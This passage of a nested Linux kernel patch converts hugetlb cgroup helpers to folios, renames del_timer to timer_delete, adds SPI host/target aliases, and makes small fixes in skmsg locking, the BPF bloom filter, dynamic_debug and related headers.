++++ b/include/linux/hugetlb_cgroup.h
+@@ -67,54 +67,61 @@ struct hugetlb_cgroup {
+ };
+ 
+ static inline struct hugetlb_cgroup *
+-__hugetlb_cgroup_from_page(struct page *page, bool rsvd)
++__hugetlb_cgroup_from_folio(struct folio *folio, bool rsvd)
+ {
+-	VM_BUG_ON_PAGE(!PageHuge(page), page);
++	struct page *tail;
+ 
+-	if (compound_order(page) < HUGETLB_CGROUP_MIN_ORDER)
++	VM_BUG_ON_FOLIO(!folio_test_hugetlb(folio), folio);
++	if (folio_order(folio) < HUGETLB_CGROUP_MIN_ORDER)
+ 		return NULL;
+-	if (rsvd)
+-		return (void *)page_private(page + SUBPAGE_INDEX_CGROUP_RSVD);
+-	else
+-		return (void *)page_private(page + SUBPAGE_INDEX_CGROUP);
++
++	if (rsvd) {
++		tail = folio_page(folio, SUBPAGE_INDEX_CGROUP_RSVD);
++		return (void *)page_private(tail);
++	}
++
++	else {
++		tail = folio_page(folio, SUBPAGE_INDEX_CGROUP);
++		return (void *)page_private(tail);
++	}
+ }
+ 
+-static inline struct hugetlb_cgroup *hugetlb_cgroup_from_page(struct page *page)
++static inline struct hugetlb_cgroup *hugetlb_cgroup_from_folio(struct folio *folio)
+ {
+-	return __hugetlb_cgroup_from_page(page, false);
++	return __hugetlb_cgroup_from_folio(folio, false);
+ }
+ 
+ static inline struct hugetlb_cgroup *
+-hugetlb_cgroup_from_page_rsvd(struct page *page)
++hugetlb_cgroup_from_folio_rsvd(struct folio *folio)
+ {
+-	return __hugetlb_cgroup_from_page(page, true);
++	return __hugetlb_cgroup_from_folio(folio, true);
+ }
+ 
+-static inline void __set_hugetlb_cgroup(struct page *page,
++static inline void __set_hugetlb_cgroup(struct folio *folio,
+ 				       struct hugetlb_cgroup *h_cg, bool rsvd)
+ {
+-	VM_BUG_ON_PAGE(!PageHuge(page), page);
++	VM_BUG_ON_FOLIO(!folio_test_hugetlb(folio), folio);
+ 
+-	if (compound_order(page) < HUGETLB_CGROUP_MIN_ORDER)
++	if (folio_order(folio) < HUGETLB_CGROUP_MIN_ORDER)
+ 		return;
+ 	if (rsvd)
+-		set_page_private(page + SUBPAGE_INDEX_CGROUP_RSVD,
++		set_page_private(folio_page(folio, SUBPAGE_INDEX_CGROUP_RSVD),
+ 				 (unsigned long)h_cg);
+ 	else
+-		set_page_private(page + SUBPAGE_INDEX_CGROUP,
++		set_page_private(folio_page(folio, SUBPAGE_INDEX_CGROUP),
+ 				 (unsigned long)h_cg);
+ }
+ 
+ static inline void set_hugetlb_cgroup(struct page *page,
+ 				     struct hugetlb_cgroup *h_cg)
+ {
+-	__set_hugetlb_cgroup(page, h_cg, false);
++	__set_hugetlb_cgroup(page_folio(page), h_cg, false);
+ }
+ 
+ static inline void set_hugetlb_cgroup_rsvd(struct page *page,
+ 					  struct hugetlb_cgroup *h_cg)
+ {
+-	__set_hugetlb_cgroup(page, h_cg, true);
++	__set_hugetlb_cgroup(page_folio(page), h_cg, true);
+ }
+ 
+ static inline bool hugetlb_cgroup_disabled(void)
+@@ -151,10 +158,10 @@ extern void hugetlb_cgroup_commit_charge(int idx, unsigned long nr_pages,
+ extern void hugetlb_cgroup_commit_charge_rsvd(int idx, unsigned long nr_pages,
+ 					      struct hugetlb_cgroup *h_cg,
+ 					      struct page *page);
+-extern void hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-					 struct page *page);
+-extern void hugetlb_cgroup_uncharge_page_rsvd(int idx, unsigned long nr_pages,
+-					      struct page *page);
++extern void hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++					 struct folio *folio);
++extern void hugetlb_cgroup_uncharge_folio_rsvd(int idx, unsigned long nr_pages,
++					      struct folio *folio);
+ 
+ extern void hugetlb_cgroup_uncharge_cgroup(int idx, unsigned long nr_pages,
+ 					   struct hugetlb_cgroup *h_cg);
+@@ -181,19 +188,13 @@ static inline void hugetlb_cgroup_uncharge_file_region(struct resv_map *resv,
+ {
+ }
+ 
+-static inline struct hugetlb_cgroup *hugetlb_cgroup_from_page(struct page *page)
++static inline struct hugetlb_cgroup *hugetlb_cgroup_from_folio(struct folio *folio)
+ {
+ 	return NULL;
+ }
+ 
+ static inline struct hugetlb_cgroup *
+-hugetlb_cgroup_from_page_resv(struct page *page)
+-{
+-	return NULL;
+-}
+-
+-static inline struct hugetlb_cgroup *
+-hugetlb_cgroup_from_page_rsvd(struct page *page)
++hugetlb_cgroup_from_folio_rsvd(struct folio *folio)
+ {
+ 	return NULL;
+ }
+@@ -253,14 +254,14 @@ hugetlb_cgroup_commit_charge_rsvd(int idx, unsigned long nr_pages,
+ {
+ }
+ 
+-static inline void hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-						struct page *page)
++static inline void hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++						struct folio *folio)
+ {
+ }
+ 
+-static inline void hugetlb_cgroup_uncharge_page_rsvd(int idx,
++static inline void hugetlb_cgroup_uncharge_folio_rsvd(int idx,
+ 						     unsigned long nr_pages,
+-						     struct page *page)
++						     struct folio *folio)
+ {
+ }
+ static inline void hugetlb_cgroup_uncharge_cgroup(int idx,
+diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
+index 4fbd5d8417111..811d59cf891ba 100644
+--- a/include/linux/hyperv.h
++++ b/include/linux/hyperv.h
+@@ -832,6 +832,7 @@ struct vmbus_gpadl {
+ 	u32 gpadl_handle;
+ 	u32 size;
+ 	void *buffer;
++	bool decrypted;
+ };
+ 
+ struct vmbus_channel {
+diff --git a/include/linux/mm_types.h b/include/linux/mm_types.h
+index 247aedb18d5c3..a9c1d611029d1 100644
+--- a/include/linux/mm_types.h
++++ b/include/linux/mm_types.h
+@@ -144,6 +144,7 @@ struct page {
+ 			atomic_t compound_pincount;
+ #ifdef CONFIG_64BIT
+ 			unsigned int compound_nr; /* 1 << compound_order */
++			unsigned long _private_1;
+ #endif
+ 		};
+ 		struct {	/* Second tail page of compound page */
+@@ -264,6 +265,7 @@ struct page {
+  * @_total_mapcount: Do not use directly, call folio_entire_mapcount().
+  * @_pincount: Do not use directly, call folio_maybe_dma_pinned().
+  * @_folio_nr_pages: Do not use directly, call folio_nr_pages().
++ * @_private_1: Do not use directly, call folio_get_private_1().
+  *
+  * A folio is a physically, virtually and logically contiguous set
+  * of bytes.  It is a power-of-two in size, and it is aligned to that
+@@ -311,6 +313,7 @@ struct folio {
+ #ifdef CONFIG_64BIT
+ 	unsigned int _folio_nr_pages;
+ #endif
++	unsigned long _private_1;
+ };
+ 
+ #define FOLIO_MATCH(pg, fl)						\
+@@ -338,6 +341,7 @@ FOLIO_MATCH(compound_mapcount, _total_mapcount);
+ FOLIO_MATCH(compound_pincount, _pincount);
+ #ifdef CONFIG_64BIT
+ FOLIO_MATCH(compound_nr, _folio_nr_pages);
++FOLIO_MATCH(_private_1, _private_1);
+ #endif
+ #undef FOLIO_MATCH
+ 
+@@ -383,6 +387,16 @@ static inline void *folio_get_private(struct folio *folio)
+ 	return folio->private;
+ }
+ 
++static inline void folio_set_private_1(struct folio *folio, unsigned long private)
++{
++	folio->_private_1 = private;
++}
++
++static inline unsigned long folio_get_private_1(struct folio *folio)
++{
++	return folio->_private_1;
++}
++
+ struct page_frag_cache {
+ 	void * va;
+ #if (PAGE_SIZE < PAGE_FRAG_CACHE_MAX_SIZE)
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 9e9794d03c9fc..2c1371320c295 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -2664,7 +2664,9 @@
+ #define PCI_DEVICE_ID_INTEL_QUARK_X1000_ILB	0x095e
+ #define PCI_DEVICE_ID_INTEL_I960	0x0960
+ #define PCI_DEVICE_ID_INTEL_I960RM	0x0962
++#define PCI_DEVICE_ID_INTEL_DSA_SPR0	0x0b25
+ #define PCI_DEVICE_ID_INTEL_CENTERTON_ILB	0x0c60
++#define PCI_DEVICE_ID_INTEL_IAX_SPR0	0x0cfe
+ #define PCI_DEVICE_ID_INTEL_8257X_SOL	0x1062
+ #define PCI_DEVICE_ID_INTEL_82573E_SOL	0x1085
+ #define PCI_DEVICE_ID_INTEL_82573L_SOL	0x108f
+diff --git a/include/linux/pinctrl/pinctrl.h b/include/linux/pinctrl/pinctrl.h
+index 487117ccb1bc2..fb25085d09224 100644
+--- a/include/linux/pinctrl/pinctrl.h
++++ b/include/linux/pinctrl/pinctrl.h
+@@ -206,6 +206,26 @@ extern int pinctrl_get_group_pins(struct pinctrl_dev *pctldev,
+ 				const char *pin_group, const unsigned **pins,
+ 				unsigned *num_pins);
+ 
++/**
++ * struct pinfunction - Description about a function
++ * @name: Name of the function
++ * @groups: An array of groups for this function
++ * @ngroups: Number of groups in @groups
++ */
++struct pinfunction {
++	const char *name;
++	const char * const *groups;
++	size_t ngroups;
++};
++
++/* Convenience macro to define a single named pinfunction */
++#define PINCTRL_PINFUNCTION(_name, _groups, _ngroups)	\
++(struct pinfunction) {					\
++		.name = (_name),			\
++		.groups = (_groups),			\
++		.ngroups = (_ngroups),			\
++	}
++
+ #if IS_ENABLED(CONFIG_OF) && IS_ENABLED(CONFIG_PINCTRL)
+ extern struct pinctrl_dev *of_pinctrl_get(struct device_node *np);
+ #else
+diff --git a/include/linux/regulator/consumer.h b/include/linux/regulator/consumer.h
+index ee3b4a0146119..a9ca87a8f4e61 100644
+--- a/include/linux/regulator/consumer.h
++++ b/include/linux/regulator/consumer.h
+@@ -361,13 +361,13 @@ devm_regulator_get_exclusive(struct device *dev, const char *id)
+ 
+ static inline int devm_regulator_get_enable(struct device *dev, const char *id)
+ {
+-	return -ENODEV;
++	return 0;
+ }
+ 
+ static inline int devm_regulator_get_enable_optional(struct device *dev,
+ 						     const char *id)
+ {
+-	return -ENODEV;
++	return 0;
+ }
+ 
+ static inline struct regulator *__must_check
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index d5f888fe0e331..cecd3b6bebb8b 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -2927,6 +2927,21 @@ static inline void skb_mac_header_rebuild(struct sk_buff *skb)
+ 	}
+ }
+ 
++/* Move the full mac header up to current network_header.
++ * Leaves skb->data pointing at offset skb->mac_len into the mac_header.
++ * Must be provided the complete mac header length.
++ */
++static inline void skb_mac_header_rebuild_full(struct sk_buff *skb, u32 full_mac_len)
++{
++	if (skb_mac_header_was_set(skb)) {
++		const unsigned char *old_mac = skb_mac_header(skb);
++
++		skb_set_mac_header(skb, -full_mac_len);
++		memmove(skb_mac_header(skb), old_mac, full_mac_len);
++		__skb_push(skb, full_mac_len - skb->mac_len);
++	}
++}
++
+ static inline int skb_checksum_start_offset(const struct sk_buff *skb)
+ {
+ 	return skb->csum_start - skb_headroom(skb);
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index bd4418377bacf..062fe440f5d09 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -456,10 +456,12 @@ static inline void sk_psock_put(struct sock *sk, struct sk_psock *psock)
+ 
+ static inline void sk_psock_data_ready(struct sock *sk, struct sk_psock *psock)
+ {
++	read_lock_bh(&sk->sk_callback_lock);
+ 	if (psock->saved_data_ready)
+ 		psock->saved_data_ready(sk);
+ 	else
+ 		sk->sk_data_ready(sk);
++	read_unlock_bh(&sk->sk_callback_lock);
+ }
+ 
+ static inline void psock_set_prog(struct bpf_prog **pprog,
+diff --git a/include/linux/slab.h b/include/linux/slab.h
+index cb4b5deca9a9c..b8e77ffc38929 100644
+--- a/include/linux/slab.h
++++ b/include/linux/slab.h
+@@ -198,7 +198,7 @@ void kfree(const void *objp);
+ void kfree_sensitive(const void *objp);
+ size_t __ksize(const void *objp);
+ 
+-DEFINE_FREE(kfree, void *, if (_T) kfree(_T))
++DEFINE_FREE(kfree, void *, if (!IS_ERR_OR_NULL(_T)) kfree(_T))
+ 
+ /**
+  * ksize - Report actual allocation size of associated object
+diff --git a/include/linux/spi/spi.h b/include/linux/spi/spi.h
+index 8e9054d9f6df0..0ce659d6fcb75 100644
+--- a/include/linux/spi/spi.h
++++ b/include/linux/spi/spi.h
+@@ -376,6 +376,7 @@ extern struct spi_device *spi_new_ancillary_device(struct spi_device *spi, u8 ch
+  * @max_speed_hz: Highest supported transfer speed
+  * @flags: other constraints relevant to this driver
+  * @slave: indicates that this is an SPI slave controller
++ * @target: indicates that this is an SPI target controller
+  * @devm_allocated: whether the allocation of this struct is devres-managed
+  * @max_transfer_size: function that returns the max transfer size for
+  *	a &spi_device; may be %NULL, so the default %SIZE_MAX will be used.
+@@ -460,6 +461,7 @@ extern struct spi_device *spi_new_ancillary_device(struct spi_device *spi, u8 ch
+  * @mem_caps: controller capabilities for the handling of memory operations.
+  * @unprepare_message: undo any work done by prepare_message().
+  * @slave_abort: abort the ongoing transfer request on an SPI slave controller
++ * @target_abort: abort the ongoing transfer request on an SPI target controller
+  * @cs_gpiods: Array of GPIO descs to use as chip select lines; one per CS
+  *	number. Any individual value may be NULL for CS lines that
+  *	are not GPIOs (driven by the SPI controller itself).
+@@ -556,8 +558,12 @@ struct spi_controller {
+ 	/* Flag indicating if the allocation of this struct is devres-managed */
+ 	bool			devm_allocated;
+ 
+-	/* Flag indicating this is an SPI slave controller */
+-	bool			slave;
++	union {
++		/* Flag indicating this is an SPI slave controller */
++		bool			slave;
++		/* Flag indicating this is an SPI target controller */
++		bool			target;
++	};
+ 
+ 	/*
+ 	 * on some hardware transfer / message size may be constrained
+@@ -670,7 +676,10 @@ struct spi_controller {
+ 			       struct spi_message *message);
+ 	int (*unprepare_message)(struct spi_controller *ctlr,
+ 				 struct spi_message *message);
+-	int (*slave_abort)(struct spi_controller *ctlr);
++	union {
++		int (*slave_abort)(struct spi_controller *ctlr);
++		int (*target_abort)(struct spi_controller *ctlr);
++	};
+ 
+ 	/*
+ 	 * These hooks are for drivers that use a generic implementation
+@@ -748,6 +757,11 @@ static inline bool spi_controller_is_slave(struct spi_controller *ctlr)
+ 	return IS_ENABLED(CONFIG_SPI_SLAVE) && ctlr->slave;
+ }
+ 
++static inline bool spi_controller_is_target(struct spi_controller *ctlr)
++{
++	return IS_ENABLED(CONFIG_SPI_SLAVE) && ctlr->target;
++}
++
+ /* PM calls that need to be issued by the driver */
+ extern int spi_controller_suspend(struct spi_controller *ctlr);
+ extern int spi_controller_resume(struct spi_controller *ctlr);
+@@ -784,6 +798,21 @@ static inline struct spi_controller *spi_alloc_slave(struct device *host,
+ 	return __spi_alloc_controller(host, size, true);
+ }
+ 
++static inline struct spi_controller *spi_alloc_host(struct device *dev,
++						    unsigned int size)
++{
++	return __spi_alloc_controller(dev, size, false);
++}
++
++static inline struct spi_controller *spi_alloc_target(struct device *dev,
++						      unsigned int size)
++{
++	if (!IS_ENABLED(CONFIG_SPI_SLAVE))
++		return NULL;
++
++	return __spi_alloc_controller(dev, size, true);
++}
++
+ struct spi_controller *__devm_spi_alloc_controller(struct device *dev,
+ 						   unsigned int size,
+ 						   bool slave);
+@@ -803,6 +832,21 @@ static inline struct spi_controller *devm_spi_alloc_slave(struct device *dev,
+ 	return __devm_spi_alloc_controller(dev, size, true);
+ }
+ 
++static inline struct spi_controller *devm_spi_alloc_host(struct device *dev,
++							 unsigned int size)
++{
++	return __devm_spi_alloc_controller(dev, size, false);
++}
++
++static inline struct spi_controller *devm_spi_alloc_target(struct device *dev,
++							   unsigned int size)
++{
++	if (!IS_ENABLED(CONFIG_SPI_SLAVE))
++		return NULL;
++
++	return __devm_spi_alloc_controller(dev, size, true);
++}
++
+ extern int spi_register_controller(struct spi_controller *ctlr);
+ extern int devm_spi_register_controller(struct device *dev,
+ 					struct spi_controller *ctlr);
+@@ -1162,6 +1206,7 @@ static inline void spi_message_free(struct spi_message *m)
+ extern int spi_setup(struct spi_device *spi);
+ extern int spi_async(struct spi_device *spi, struct spi_message *message);
+ extern int spi_slave_abort(struct spi_device *spi);
++extern int spi_target_abort(struct spi_device *spi);
+ 
+ static inline size_t
+ spi_max_message_size(struct spi_device *spi)
+diff --git a/include/linux/sunrpc/clnt.h b/include/linux/sunrpc/clnt.h
+index c794b0ce4e782..809c23120d548 100644
+--- a/include/linux/sunrpc/clnt.h
++++ b/include/linux/sunrpc/clnt.h
+@@ -131,6 +131,7 @@ struct rpc_create_args {
+ 	const char		*servername;
+ 	const char		*nodename;
+ 	const struct rpc_program *program;
++	struct rpc_stat		*stats;
+ 	u32			prognumber;	/* overrides program->number */
+ 	u32			version;
+ 	rpc_authflavor_t	authflavor;
+diff --git a/include/linux/swapops.h b/include/linux/swapops.h
+index b07b277d6a166..1f59f9edcc241 100644
+--- a/include/linux/swapops.h
++++ b/include/linux/swapops.h
+@@ -409,6 +409,55 @@ static inline bool is_migration_entry_dirty(swp_entry_t entry)
+ }
+ #endif	/* CONFIG_MIGRATION */
+ 
++#ifdef CONFIG_MEMORY_FAILURE
++
++extern atomic_long_t num_poisoned_pages __read_mostly;
++
++/*
++ * Support for hardware poisoned pages
++ */
++static inline swp_entry_t make_hwpoison_entry(struct page *page)
++{
++	BUG_ON(!PageLocked(page));
++	return swp_entry(SWP_HWPOISON, page_to_pfn(page));
++}
++
++static inline int is_hwpoison_entry(swp_entry_t entry)
++{
++	return swp_type(entry) == SWP_HWPOISON;
++}
++
++static inline void num_poisoned_pages_inc(void)
++{
++	atomic_long_inc(&num_poisoned_pages);
++}
++
++static inline void num_poisoned_pages_sub(long i)
++{
++	atomic_long_sub(i, &num_poisoned_pages);
++}
++
++#else  /* CONFIG_MEMORY_FAILURE */
++
++static inline swp_entry_t make_hwpoison_entry(struct page *page)
++{
++	return swp_entry(0, 0);
++}
++
++static inline int is_hwpoison_entry(swp_entry_t swp)
++{
++	return 0;
++}
++
++static inline void num_poisoned_pages_inc(void)
++{
++}
++
++static inline void num_poisoned_pages_sub(long i)
++{
++}
++#endif  /* CONFIG_MEMORY_FAILURE */
++
+ typedef unsigned long pte_marker;
+ 
+ #define  PTE_MARKER_UFFD_WP  BIT(0)
+@@ -503,8 +552,9 @@ static inline struct page *pfn_swap_entry_to_page(swp_entry_t entry)
+ 
+ /*
+  * A pfn swap entry is a special type of swap entry that always has a pfn stored
+- * in the swap offset. They are used to represent unaddressable device memory
+- * and to restrict access to a page undergoing migration.
++ * in the swap offset. They can either be used to represent unaddressable device
++ * memory, to restrict access to a page undergoing migration or to represent a
++ * pfn which has been hwpoisoned and unmapped.
+  */
+ static inline bool is_pfn_swap_entry(swp_entry_t entry)
+ {
+@@ -512,7 +562,7 @@ static inline bool is_pfn_swap_entry(swp_entry_t entry)
+ 	BUILD_BUG_ON(SWP_TYPE_SHIFT < SWP_PFN_BITS);
+ 
+ 	return is_migration_entry(entry) || is_device_private_entry(entry) ||
+-	       is_device_exclusive_entry(entry);
++	       is_device_exclusive_entry(entry) || is_hwpoison_entry(entry);
+ }
+ 
+ struct page_vma_mapped_walk;
+@@ -581,55 +631,6 @@ static inline int is_pmd_migration_entry(pmd_t pmd)
+ }
+ #endif  /* CONFIG_ARCH_ENABLE_THP_MIGRATION */
+ 
+-#ifdef CONFIG_MEMORY_FAILURE
+-
+-extern atomic_long_t num_poisoned_pages __read_mostly;
+-
+-/*
+- * Support for hardware poisoned pages
+- */
+-static inline swp_entry_t make_hwpoison_entry(struct page *page)
+-{
+-	BUG_ON(!PageLocked(page));
+-	return swp_entry(SWP_HWPOISON, page_to_pfn(page));
+-}
+-
+-static inline int is_hwpoison_entry(swp_entry_t entry)
+-{
+-	return swp_type(entry) == SWP_HWPOISON;
+-}
+-
+-static inline void num_poisoned_pages_inc(void)
+-{
+-	atomic_long_inc(&num_poisoned_pages);
+-}
+-
+-static inline void num_poisoned_pages_sub(long i)
+-{
+-	atomic_long_sub(i, &num_poisoned_pages);
+-}
+-
+-#else  /* CONFIG_MEMORY_FAILURE */
+-
+-static inline swp_entry_t make_hwpoison_entry(struct page *page)
+-{
+-	return swp_entry(0, 0);
+-}
+-
+-static inline int is_hwpoison_entry(swp_entry_t swp)
+-{
+-	return 0;
+-}
+-
+-static inline void num_poisoned_pages_inc(void)
+-{
+-}
+-
+-static inline void num_poisoned_pages_sub(long i)
+-{
+-}
+-#endif  /* CONFIG_MEMORY_FAILURE */
+-
+ static inline int non_swap_entry(swp_entry_t entry)
+ {
+ 	return swp_type(entry) >= MAX_SWAPFILES;
+diff --git a/include/linux/timer.h b/include/linux/timer.h
+index 6d18f04ad7039..e338e173ce8bc 100644
+--- a/include/linux/timer.h
++++ b/include/linux/timer.h
+@@ -169,7 +169,6 @@ static inline int timer_pending(const struct timer_list * timer)
+ }
+ 
+ extern void add_timer_on(struct timer_list *timer, int cpu);
+-extern int del_timer(struct timer_list * timer);
+ extern int mod_timer(struct timer_list *timer, unsigned long expires);
+ extern int mod_timer_pending(struct timer_list *timer, unsigned long expires);
+ extern int timer_reduce(struct timer_list *timer, unsigned long expires);
+@@ -184,6 +183,7 @@ extern void add_timer(struct timer_list *timer);
+ 
+ extern int try_to_del_timer_sync(struct timer_list *timer);
+ extern int timer_delete_sync(struct timer_list *timer);
++extern int timer_delete(struct timer_list *timer);
+ 
+ /**
+  * del_timer_sync - Delete a pending timer and wait for a running callback
+@@ -198,7 +198,18 @@ static inline int del_timer_sync(struct timer_list *timer)
+ 	return timer_delete_sync(timer);
+ }
+ 
+-#define del_singleshot_timer_sync(t) del_timer_sync(t)
++/**
++ * del_timer - Delete a pending timer
++ * @timer:	The timer to be deleted
++ *
++ * See timer_delete() for detailed explanation.
++ *
++ * Do not use in new code. Use timer_delete() instead.
++ */
++static inline int del_timer(struct timer_list *timer)
++{
++	return timer_delete(timer);
++}
+ 
+ extern void init_timers(void);
+ struct hrtimer;
+diff --git a/include/net/xfrm.h b/include/net/xfrm.h
+index 9ec6f2e92ad3a..5b9c2c535702c 100644
+--- a/include/net/xfrm.h
++++ b/include/net/xfrm.h
+@@ -1032,6 +1032,9 @@ struct xfrm_offload {
+ #define CRYPTO_INVALID_PACKET_SYNTAX		64
+ #define CRYPTO_INVALID_PROTOCOL			128
+ 
++	/* Used to keep whole l2 header for transport mode GRO */
++	__u32			orig_mac_len;
++
+ 	__u8			proto;
+ 	__u8			inner_ipproto;
+ };
+diff --git a/include/uapi/scsi/scsi_bsg_mpi3mr.h b/include/uapi/scsi/scsi_bsg_mpi3mr.h
+index fdc3517f9e199..c48c5d08c0fa0 100644
+--- a/include/uapi/scsi/scsi_bsg_mpi3mr.h
++++ b/include/uapi/scsi/scsi_bsg_mpi3mr.h
+@@ -382,7 +382,7 @@ struct mpi3mr_bsg_in_reply_buf {
+ 	__u8	mpi_reply_type;
+ 	__u8	rsvd1;
+ 	__u16	rsvd2;
+-	__u8	reply_buf[1];
++	__u8	reply_buf[];
+ };
+ 
+ /**
+diff --git a/kernel/bpf/bloom_filter.c b/kernel/bpf/bloom_filter.c
+index 48ee750849f25..78e810f49c445 100644
+--- a/kernel/bpf/bloom_filter.c
++++ b/kernel/bpf/bloom_filter.c
+@@ -88,6 +88,18 @@ static int bloom_map_get_next_key(struct bpf_map *map, void *key, void *next_key
+ 	return -EOPNOTSUPP;
+ }
+ 
++/* Called from syscall */
++static int bloom_map_alloc_check(union bpf_attr *attr)
++{
++	if (attr->value_size > KMALLOC_MAX_SIZE)
++		/* if value_size is bigger, the user space won't be able to
++		 * access the elements.
++		 */
++		return -E2BIG;
++
++	return 0;
++}
++
+ static struct bpf_map *bloom_map_alloc(union bpf_attr *attr)
+ {
+ 	u32 bitset_bytes, bitset_mask, nr_hash_funcs, nr_bits;
+@@ -196,6 +208,7 @@ static int bloom_map_check_btf(const struct bpf_map *map,
+ BTF_ID_LIST_SINGLE(bpf_bloom_map_btf_ids, struct, bpf_bloom_filter)
+ const struct bpf_map_ops bloom_filter_map_ops = {
+ 	.map_meta_equal = bpf_map_meta_equal,
++	.map_alloc_check = bloom_map_alloc_check,
+ 	.map_alloc = bloom_map_alloc,
+ 	.map_free = bloom_map_free,
+ 	.map_get_next_key = bloom_map_get_next_key,
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 27cc6e3db5a86..18b3f429abe17 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -13177,8 +13177,7 @@ static int resolve_pseudo_ldimm64(struct bpf_verifier_env *env)
+ 			f = fdget(fd);
+ 			map = __bpf_map_get(f);
+ 			if (IS_ERR(map)) {
+-				verbose(env, "fd %d is not pointing to valid bpf_map\n",
+-					insn[0].imm);
++				verbose(env, "fd %d is not pointing to valid bpf_map\n", fd);
+ 				return PTR_ERR(map);
+ 			}
+ 
+diff --git a/kernel/time/timer.c b/kernel/time/timer.c
+index 59469897432bc..e09852be4e638 100644
+--- a/kernel/time/timer.c
++++ b/kernel/time/timer.c
+@@ -1255,7 +1255,7 @@ void add_timer_on(struct timer_list *timer, int cpu)
+ EXPORT_SYMBOL_GPL(add_timer_on);
+ 
+ /**
+- * del_timer - Deactivate a timer.
++ * timer_delete - Deactivate a timer
+  * @timer:	The timer to be deactivated
+  *
+  * The function only deactivates a pending timer, but contrary to
+@@ -1268,7 +1268,7 @@ EXPORT_SYMBOL_GPL(add_timer_on);
+  * * %0 - The timer was not pending
+  * * %1 - The timer was pending and deactivated
+  */
+-int del_timer(struct timer_list *timer)
++int timer_delete(struct timer_list *timer)
+ {
+ 	struct timer_base *base;
+ 	unsigned long flags;
+@@ -1284,7 +1284,7 @@ int del_timer(struct timer_list *timer)
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(del_timer);
++EXPORT_SYMBOL(timer_delete);
+ 
+ /**
+  * try_to_del_timer_sync - Try to deactivate a timer
+@@ -1963,7 +1963,7 @@ signed long __sched schedule_timeout(signed long timeout)
+ 	timer_setup_on_stack(&timer.timer, process_timeout, 0);
+ 	__mod_timer(&timer.timer, expire, MOD_TIMER_NOTPENDING);
+ 	schedule();
+-	del_singleshot_timer_sync(&timer.timer);
++	del_timer_sync(&timer.timer);
+ 
+ 	/* Remove the timer from the object tracker */
+ 	destroy_timer_on_stack(&timer.timer);
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 95541b99aa8ea..b2dff19358938 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -343,7 +343,7 @@ config DEBUG_INFO_SPLIT
+ 	  Incompatible with older versions of ccache.
+ 
+ config DEBUG_INFO_BTF
+-	bool "Generate BTF typeinfo"
++	bool "Generate BTF type information"
+ 	depends on !DEBUG_INFO_SPLIT && !DEBUG_INFO_REDUCED
+ 	depends on !GCC_PLUGIN_RANDSTRUCT || COMPILE_TEST
+ 	depends on BPF_SYSCALL
+@@ -374,7 +374,8 @@ config PAHOLE_HAS_LANG_EXCLUDE
+ 	  using DEBUG_INFO_BTF_MODULES.
+ 
+ config DEBUG_INFO_BTF_MODULES
+-	def_bool y
++	bool "Generate BTF type information for kernel modules"
++	default y
+ 	depends on DEBUG_INFO_BTF && MODULES && PAHOLE_HAS_SPLIT_BTF
+ 	help
+ 	  Generate compact split BTF type information for kernel modules.
+diff --git a/lib/dynamic_debug.c b/lib/dynamic_debug.c
+index 009f2ead09c1e..939678ea930e0 100644
+--- a/lib/dynamic_debug.c
++++ b/lib/dynamic_debug.c
+@@ -301,7 +301,11 @@ static int ddebug_tokenize(char *buf, char *words[], int maxwords)
+ 		} else {
+ 			for (end = buf; *end && !isspace(*end); end++)
+ 				;
+-			BUG_ON(end == buf);
++			if (end == buf) {
++				pr_err("parse err after word:%d=%s\n", nwords,
++				       nwords ? words[nwords - 1] : "<none>");
++				return -EINVAL;
++			}
+ 		}
+ 
+ 		/* `buf' is start of word, `end' is one past its end */
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 37288a7f0fa65..4361dcf70139f 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1661,9 +1661,10 @@ static void __remove_hugetlb_page(struct hstate *h, struct page *page,
+ 							bool demote)
+ {
+ 	int nid = page_to_nid(page);
++	struct folio *folio = page_folio(page);
+ 
+-	VM_BUG_ON_PAGE(hugetlb_cgroup_from_page(page), page);
+-	VM_BUG_ON_PAGE(hugetlb_cgroup_from_page_rsvd(page), page);
++	VM_BUG_ON_FOLIO(hugetlb_cgroup_from_folio(folio), folio);
++	VM_BUG_ON_FOLIO(hugetlb_cgroup_from_folio_rsvd(folio), folio);
+ 
+ 	lockdep_assert_held(&hugetlb_lock);
+ 	if (hstate_is_gigantic(h) && !gigantic_page_runtime_supported())
+@@ -1761,7 +1762,6 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ {
+ 	int i;
+ 	struct page *subpage;
+-	bool clear_dtor = HPageVmemmapOptimized(page);
+ 
+ 	if (hstate_is_gigantic(h) && !gigantic_page_runtime_supported())
+ 		return;
+@@ -1796,7 +1796,7 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 	 * If vmemmap pages were allocated above, then we need to clear the
+ 	 * hugetlb destructor under the hugetlb lock.
+ 	 */
+-	if (clear_dtor) {
++	if (PageHuge(page)) {
+ 		spin_lock_irq(&hugetlb_lock);
+ 		__clear_hugetlb_destructor(h, page);
+ 		spin_unlock_irq(&hugetlb_lock);
+@@ -1917,21 +1917,22 @@ void free_huge_page(struct page *page)
+ 	 * Can't pass hstate in here because it is called from the
+ 	 * compound page destructor.
+ 	 */
+-	struct hstate *h = page_hstate(page);
+-	int nid = page_to_nid(page);
+-	struct hugepage_subpool *spool = hugetlb_page_subpool(page);
++	struct folio *folio = page_folio(page);
++	struct hstate *h = folio_hstate(folio);
++	int nid = folio_nid(folio);
++	struct hugepage_subpool *spool = hugetlb_folio_subpool(folio);
